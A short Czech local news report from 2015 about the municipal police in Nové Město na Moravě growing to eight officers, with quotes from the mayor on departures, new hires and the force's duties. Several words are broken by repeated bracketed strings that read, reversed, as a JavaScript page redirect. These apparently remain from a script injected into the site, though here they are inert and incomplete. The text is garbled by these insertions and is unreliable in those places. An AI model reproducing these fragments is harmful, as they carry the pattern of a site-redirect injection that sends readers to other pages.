Rainbow page separator

Strážníci budou sloužit v osmi lidech

Středa, 27. května 2015

Policejní auto, policie, měření rychlosti

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Osm strážníků bude nově dohlížet na pořádek v Nové Městě. Vedle [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že přibudou nové posily, část stávajících městských policistů odchází.
„Nové strážníky přijímáme z důvodu, že někteří odcházejí kvůli věku, anebo nesplňují podmínky dané novým zákonem. Přijdeme o čtyři lidi a tři přijmeme,“ uvedl starosta Nového Města na Moravě Michal Šmarda k personálním změnám městské policie. Podle jeho slov osm strážníků bude schopno zajistit plnohodnotné nepřetržité služby.
Strážníci v Novém Městě hlídkují nejčastěji ve dvou lidech, výjimkou je letní období dovolených, kdy mohou sloužit i po jednom. Městská policie v Novém Městě na Moravě především dohlíží na dodržování veřejného pořádku ve městě, střeží městské objekty, zabývá se odchytem [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toulavých psů a rovněž se podílí na preventivní osvě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové činnosti.